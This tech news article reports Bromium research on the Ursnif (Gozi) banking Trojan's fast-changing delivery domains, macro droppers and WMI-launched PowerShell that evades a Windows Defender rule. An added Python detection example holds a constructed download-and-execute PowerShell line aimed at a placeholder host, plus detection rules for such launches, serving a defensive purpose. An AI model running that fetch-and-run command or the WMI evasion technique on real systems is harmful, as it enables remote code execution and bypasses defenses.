
This Malware Moves Delivery Infrastructure Every 12 Hours

"Only one domain reputation service had classified the Ursnif delivery domain as malicious"

By CBR Staff Writer

The Trojan Ursnif (also known as Gozi) is getting increasingly sophisticated, researchers at security company Bromium say. Their latest analysis shows the malware changing its delivery infrastructure as rapidly as every 12 hours, leaving perimeter security controls that rely on traditional detection-based techniques little time to block the download of the malware.

The credential-stealing Trojan is, alongside Emotet, one of the most pervasive and effective malware families. (Italian security firm Yoroi describes it as a “fork of the original Gozi-ISFB banking Trojan”, the source code of which leaked in 2014.)

Ursnif uses weaponised Microsoft Office documents with an embedded VBA macro that acts as a dropper, and multi-stage, highly obfuscated PowerShell scripts to hide the real payload. Ursnif also uses steganography to hide malicious code.

Ursnif Evading “Malicious” Domain Classification by Moving Domains in Less than 12 Hours

The report by Bromium says Ursnif’s operators are increasingly linking different techniques together to “effectively socially engineer targets, evade perimeter detection and bypass one of Windows Defender’s attack surface reduction rules” while using a rapidly shifting delivery infrastructure to evade detection.

The shift to a rapidly changing delivery infrastructure stands out: “Our research found that the average time from the registration of a domain used to host Ursnif executables to when a user first runs the corresponding Word dropper is less than 12 hours.”


Bromium noted: “The speed at which Ursnif’s operators can change its infrastructure gives web proxies and other perimeter security controls that rely on traditional detection-based techniques little time to block the download of the malware.”

“In one example, only one domain reputation service had classified the Ursnif delivery domain as malicious at the time when the Word dropper was run.”


The latest sample analysed by Bromium contains an obfuscated VBA AutoOpen macro, which runs each time the document is opened. The document uses the common trick of requesting the user to enable macros, if they are not already enabled.

“The macro runs a Base64 encoded PowerShell command using the Win32_Process and Win32_ProcessStartup WMI classes. The resulting PowerShell instance is run as a child process of WmiPrvSe.exe (WMI Provider Host). This benefits the adversary by defeating detection techniques that rely on parent-child process relationships because the parent process ID of the Ursnif executable will be the process ID of WmiPrvSe.exe.”

“In our testing on Windows 10 Enterprise 1809, we found that this technique is effective at bypassing the Windows Defender attack surface reduction rule that blocks Office applications from creating child processes. In some of the samples, this was used in conjunction with a COM technique that also spoofed the parent process ID of the Ursnif process”, Bromium’s Alex Holland wrote.
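The parent-process problem described above is easy to see in telemetry. The following is an added example, not code from Bromium’s report or from any Ursnif sample: it runs two detection rules over constructed Sysmon-style process-creation records (the field names and every path, PID and command line are assumptions, built inline for the example). The first rule is the naive “Office application spawned a child process” check that the attack surface reduction rule embodies; the second looks for PowerShell whose recorded parent is WmiPrvSe.exe, which is what the Win32_Process.Create path leaves behind. It also decodes the Base64 UTF-16LE -EncodedCommand argument so an analyst can read the stage-2 command.

```python
"""Flag PowerShell launched through WMI (parent = WmiPrvSe.exe) and decode -EncodedCommand.

Added example; the events below are constructed, not real telemetry.
"""
import base64
import binascii
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
WMI_HOST = "wmiprvse.exe"

# Constructed stage-2 command; example.invalid is a reserved name that never resolves.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
# PowerShell's -EncodedCommand takes Base64 over the UTF-16LE bytes of the script.
ENCODED_STAGE2 = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon Event ID 1-style records (field names are assumptions).
SAMPLE_EVENTS = [
    # 1. Word opened from Explorer: nothing suspicious.
    {"pid": 4120, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_pid": 812, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n invoice.doc'},
    # 2. Classic macro chain: Word is the direct parent of PowerShell.
    {"pid": 5210, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_pid": 4120, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {ENCODED_STAGE2}"},
    # 3. WMI-brokered chain: the macro called Win32_Process.Create, so the
    #    recorded parent is the WMI Provider Host, not WINWORD.EXE.
    {"pid": 5388, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_pid": 2904, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSe.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_STAGE2}"},
    # 4. An administrator's interactive console: PowerShell from Explorer, no encoded command.
    {"pid": 6001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_pid": 812, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoExit -ExecutionPolicy RemoteSigned"},
]

# "-e", "-ec", "-enc", ... : PowerShell accepts -EncodedCommand, -ec and unambiguous prefixes.
_ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so comparisons ignore directory and case."""
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if the command line has none."""
    for flag, blob in _ENC_FLAG.findall(cmdline):
        flag = flag.lower()
        # Skip unrelated switches such as -ExecutionPolicy.
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not a valid payload; keep looking
    return None


def classify_event(event: dict) -> list:
    """Apply the three checks to one process-creation record and return the names that fire."""
    findings = []
    child = basename(event["image"])
    parent = basename(event["parent_image"])
    if parent in OFFICE_APPS:
        # What the ASR "block Office child processes" rule keys on; misses the WMI path.
        findings.append("office_child_process")
    if parent == WMI_HOST and child in POWERSHELL:
        # The WMI-brokered launch: WmiPrvSe.exe is the recorded parent.
        findings.append("wmi_spawned_powershell")
    if child in POWERSHELL and decode_encoded_command(event["cmdline"]) is not None:
        findings.append("encoded_command")
    return findings


def find_suspicious(events: list) -> dict:
    """Map PID -> findings for every event that triggered at least one check."""
    hits = {}
    for event in events:
        findings = classify_event(event)
        if findings:
            hits[event["pid"]] = findings
    return hits


if __name__ == "__main__":
    for pid, findings in find_suspicious(SAMPLE_EVENTS).items():
        print(pid, findings)
    print("stage 2:", decode_encoded_command(SAMPLE_EVENTS[2]["cmdline"]))
```

Run against the sample, only the Office-parent rule fires on PID 5210, while PID 5388 is caught solely by the WmiPrvSe.exe-parent rule: a monitoring stack that keys purely on Office parent-child relationships never sees the second process. In production the WmiPrvSe.exe rule needs tuning, since management agents legitimately create processes through WMI; correlating the launching Office process is harder, because the WMI call does not carry the caller's PID into the child.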

(The company noted that endpoints that are running Bromium Secure Platform are protected from this threat because each user task, such as opening an Office document or clicking a malicious link, is run in its own isolated micro-virtual machine.)
